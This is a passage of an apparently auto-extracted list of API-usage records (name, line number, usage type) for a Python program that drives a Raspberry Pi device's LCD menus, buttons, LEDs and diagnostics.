"usage_type": "name"}, {"api_name": "adafruit_aw9523.AW9523", "line_number": 108, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device.I2CDevice", "line_number": 109, "usage_type": "call"}, {"api_name": "adafruit_bus_device.i2c_device", "line_number": 109, "usage_type": "name"}, 
{"api_name": "self.configparser.aw.reset", "line_number": 110, "usage_type": "call"}, {"api_name": "self.configparser.aw", "line_number": 110, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 110, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 112, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 112, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 121, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 140, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 150, "usage_type": "call"}, {"api_name": "RPi.GPIO.add_event_detect", "line_number": 151, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 151, "usage_type": "name"}, {"api_name": "RPi.GPIO.FALLING", "line_number": 151, "usage_type": "attribute"}, {"api_name": "self.configparser.key_press_cb", "line_number": 151, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 151, "usage_type": "name"}, {"api_name": "self.configparser.aw", "line_number": 154, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 154, "usage_type": "name"}, {"api_name": "math.log2", "line_number": 159, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 162, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 162, "usage_type": "name"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 163, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 163, "usage_type": "name"}, {"api_name": "self.configparser.menu_active_countdown", "line_number": 168, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 168, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 171, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 171, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 174, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 174, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 175, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 175, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 177, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 177, "usage_type": "name"}, {"api_name": "self.configparser.window_stack.pop", "line_number": 187, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 187, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 187, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 188, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 188, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 189, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 189, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 191, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 191, "usage_type": "name"}, {"api_name": "self.configparser.show_home_screen", "line_number": 193, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 193, 
"usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 195, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 195, "usage_type": "name"}, {"api_name": "self.configparser.window_stack", "line_number": 195, "usage_type": "attribute"}, {"api_name": "self.configparser.window_stack.append", "line_number": 196, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 196, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 196, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 196, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 197, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 197, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 197, "usage_type": "attribute"}, {"api_name": "self.configparser.diag_shown", "line_number": 199, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 199, "usage_type": "name"}, {"api_name": "self.configparser.diag_shown", "line_number": 200, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 200, "usage_type": "name"}, {"api_name": "self.configparser.window_stack.clear", "line_number": 203, "usage_type": "call"}, {"api_name": "self.configparser.window_stack", "line_number": 203, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 203, "usage_type": "name"}, {"api_name": "self.configparser.show_home_screen", "line_number": 205, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 205, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 207, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 207, "usage_type": "name"}, {"api_name": "self.configparser.lcd.clear", "line_number": 210, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 210, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 210, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 213, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 213, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 214, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 214, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 217, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 217, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 221, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 221, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 222, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 222, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 229, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 229, "usage_type": "name"}, {"api_name": "self.configparser.round_corner", "line_number": 230, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 230, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 240, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 240, "usage_type": "name"}, {"api_name": "self.configparser.round_corner", "line_number": 241, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 241, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 
250, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 250, "usage_type": "name"}, {"api_name": "self.configparser.width", "line_number": 250, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 250, "usage_type": "name"}, {"api_name": "self.configparser.height", "line_number": 250, "usage_type": "attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 251, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 251, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 253, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 253, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 254, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 254, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 255, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 255, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 257, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 257, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 257, "usage_type": "attribute"}, {"api_name": "self.configparser.titles", "line_number": 258, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 258, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 258, "usage_type": "attribute"}, {"api_name": "self.configparser.titles", "line_number": 259, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 259, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 259, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 268, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 268, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 268, "usage_type": "attribute"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 279, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 279, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_skip", "line_number": 279, "usage_type": "attribute"}, {"api_name": "self.configparser.half_round_rectangle", "line_number": 283, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 283, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 283, "usage_type": "attribute"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 292, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 292, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 293, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 293, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 295, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 295, "usage_type": "name"}, {"api_name": "self.configparser.menu_row_y_size", "line_number": 296, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 296, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 299, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 299, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 300, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 300, "usage_type": "name"}, {"api_name": 
"self.configparser.chin", "line_number": 315, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 315, "usage_type": "name"}, {"api_name": "PIL.Image.alpha_composite", "line_number": 317, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 317, "usage_type": "name"}, {"api_name": "self.configparser.lcd.show_image", "line_number": 320, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 320, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 320, "usage_type": "name"}, {"api_name": "self.configparser.config.read", "line_number": 323, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 323, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 323, "usage_type": "name"}, {"api_name": "self.configparser.status.read", "line_number": 324, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 324, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 324, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 325, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 325, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 325, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 326, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 326, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 326, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 329, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 329, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 329, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 334, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 334, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 334, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 335, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 335, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 335, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 338, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 338, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 338, "usage_type": "name"}, {"api_name": "self.configparser.lcd.set_logo_text", "line_number": 342, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 342, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 342, "usage_type": "name"}, {"api_name": "self.configparser.lcd.show_logo", "line_number": 343, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 343, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 343, "usage_type": "name"}, {"api_name": "self.configparser.device.reboot", "line_number": 344, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 344, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 344, "usage_type": "name"}, {"api_name": "self.configparser.lcd.set_logo_text", "line_number": 348, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 348, "usage_type": "attribute"}, {"api_name": 
"self.configparser", "line_number": 348, "usage_type": "name"}, {"api_name": "self.configparser.lcd.show_logo", "line_number": 349, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 349, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 349, "usage_type": "name"}, {"api_name": "self.configparser.device.turn_off", "line_number": 350, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 350, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 350, "usage_type": "name"}, {"api_name": "diag.WPDiag", "line_number": 354, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 354, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 354, "usage_type": "name"}, {"api_name": "self.configparser.lcd.long_text", "line_number": 356, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 356, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 356, "usage_type": "name"}, {"api_name": "self.configparser.config.get", "line_number": 357, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 357, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 357, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 358, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 358, "usage_type": "name"}, {"api_name": "diag.get_error_code", "line_number": 358, "usage_type": "call"}, {"api_name": "self.configparser.config.get", "line_number": 359, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 359, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 359, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 360, "usage_type": "call"}, {"api_name": "self.configparser.diag_code", "line_number": 361, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 361, "usage_type": "name"}, {"api_name": "self.configparser.device.get_local_ip", "line_number": 363, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 363, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 363, "usage_type": "name"}, {"api_name": "self.configparser.device.get_local_mac", "line_number": 364, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 364, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 364, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 365, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 365, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 365, "usage_type": "name"}, {"api_name": "self.configparser.logger.debug", "line_number": 366, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 366, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 366, "usage_type": "name"}, {"api_name": "self.configparser", "line_number": 370, "usage_type": "argument"}, {"api_name": "self.configparser.run_diagnostics", "line_number": 371, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 371, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 372, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 372, "usage_type": "name"}, {"api_name": 
"self.configparser.lcd.display", "line_number": 373, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 373, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 373, "usage_type": "name"}, {"api_name": "self.configparser.diag_shown", "line_number": 374, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 374, "usage_type": "name"}, {"api_name": "self.configparser.logger.debug", "line_number": 380, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 380, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 380, "usage_type": "name"}, {"api_name": "os.kill", "line_number": 383, "usage_type": "call"}, {"api_name": "signal.SIGUSR1", "line_number": 383, "usage_type": "attribute"}, {"api_name": "self.configparser.logger.error", "line_number": 385, "usage_type": "call"}, {"api_name": "self.configparser.logger", "line_number": 385, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 385, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 389, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 389, "usage_type": "name"}, {"api_name": "self.configparser.titles.insert", "line_number": 390, "usage_type": "call"}, {"api_name": "self.configparser.titles", "line_number": 390, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 390, "usage_type": "name"}, {"api_name": "self.configparser.lcd.display", "line_number": 391, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 391, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 391, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 394, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 394, "usage_type": "name"}, {"api_name": "self.configparser.menu_index", "line_number": 394, "usage_type": "attribute"}, {"api_name": "self.configparser.render", "line_number": 395, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 395, "usage_type": "name"}, {"api_name": "self.configparser.status.read", "line_number": 398, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 398, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 398, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 399, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 399, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 399, "usage_type": "name"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 401, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 401, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 401, "usage_type": "attribute"}, {"api_name": "self.configparser.diag_code", "line_number": 402, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 402, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 404, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 404, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 404, "usage_type": "attribute"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 405, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 405, "usage_type": "name"}, {"api_name": 
"constants.HEALTHY_DIAG_CODE", "line_number": 405, "usage_type": "attribute"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 408, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 408, "usage_type": "name"}, {"api_name": "self.configparser.err_pending_ack", "line_number": 409, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 409, "usage_type": "name"}, {"api_name": "self.configparser.led_client.pulse", "line_number": 411, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 411, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 411, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 412, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 412, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 414, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 414, "usage_type": "name"}, {"api_name": "self.configparser.leds_turned_for_error", "line_number": 419, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 419, "usage_type": "name"}, {"api_name": "self.configparser.led_client.blank", "line_number": 420, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 420, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 420, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 423, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 423, "usage_type": "name"}, {"api_name": "self.configparser.status", "line_number": 424, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 424, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 424, "usage_type": "call"}, {"api_name": "self.configparser.status.read", "line_number": 425, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 425, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 425, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 426, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 426, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 426, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 427, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 427, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 427, "usage_type": "name"}, {"api_name": "self.configparser.device.needs_package_update", "line_number": 428, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 428, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 428, "usage_type": "name"}, {"api_name": "self.configparser.show_claim_info_qrcode", "line_number": 434, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 434, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 437, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 437, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 438, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 438, "usage_type": "name"}, {"api_name": "self.configparser.refresh_status", "line_number": 439, 
"usage_type": "call"}, {"api_name": "self.configparser", "line_number": 439, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 440, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 440, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 441, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 441, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 442, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 442, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 443, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 443, "usage_type": "name"}, {"api_name": "self.configparser.show_main_menu", "line_number": 443, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 444, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 444, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 446, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 446, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 446, "usage_type": "attribute"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 447, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 447, "usage_type": "name"}, {"api_name": "constants.HEALTHY_DIAG_CODE", "line_number": 447, "usage_type": "attribute"}, {"api_name": "self.configparser.prev_diag_code", "line_number": 448, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 448, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 451, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 451, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 453, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 453, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 456, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 456, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 457, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 457, "usage_type": "name"}, {"api_name": "self.configparser.show_summary", "line_number": 457, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 458, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 458, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 460, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 460, "usage_type": "name"}, {"api_name": "self.configparser.countdown_to_turn_off_screen", "line_number": 461, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 461, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 465, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 465, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 466, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 466, "usage_type": "name"}, {"api_name": "self.configparser.titles", "line_number": 467, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 467, "usage_type": "name"}, 
{"api_name": "self.configparser.lcd.get_status_icons_v2", "line_number": 468, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 468, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 468, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 468, "usage_type": "attribute"}, {"api_name": "self.configparser.chin", "line_number": 469, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 469, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 470, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 470, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 471, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 471, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 472, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 472, "usage_type": "name"}, {"api_name": "self.configparser.screen_timed_out", "line_number": 473, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 473, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 474, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 474, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 477, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 477, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 478, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 478, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 479, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 479, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 482, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 482, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 483, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 483, "usage_type": "name"}, {"api_name": "self.configparser.titles.insert", "line_number": 484, "usage_type": "call"}, {"api_name": "self.configparser.titles", "line_number": 484, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 484, "usage_type": "name"}, {"api_name": "self.configparser.status", "line_number": 485, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 485, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 485, "usage_type": "call"}, {"api_name": "self.configparser.status.read", "line_number": 486, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 486, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 486, "usage_type": "name"}, {"api_name": "self.configparser.status.get", "line_number": 487, "usage_type": "call"}, {"api_name": "self.configparser.status", "line_number": 487, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 487, "usage_type": "name"}, {"api_name": "self.configparser.lcd.get_status_icons_v2", "line_number": 488, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 488, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 488, "usage_type": "name"}, {"api_name": "self.configparser.diag_code", "line_number": 488, "usage_type": 
"attribute"}, {"api_name": "self.configparser.lcd.show_summary", "line_number": 505, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 505, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 505, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 510, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 510, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 511, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 511, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 512, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 512, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 513, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 513, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 516, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 516, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 517, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 517, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 518, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 518, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 519, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 519, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 522, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 522, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 523, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 523, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 524, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 524, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 525, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 525, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 528, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 528, "usage_type": "name"}, {"api_name": "self.configparser.current_title", "line_number": 529, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 529, "usage_type": "name"}, {"api_name": "self.configparser.set_current_menu", "line_number": 530, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 530, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 531, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 531, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 534, "usage_type": "attribute"}, {"api_name": 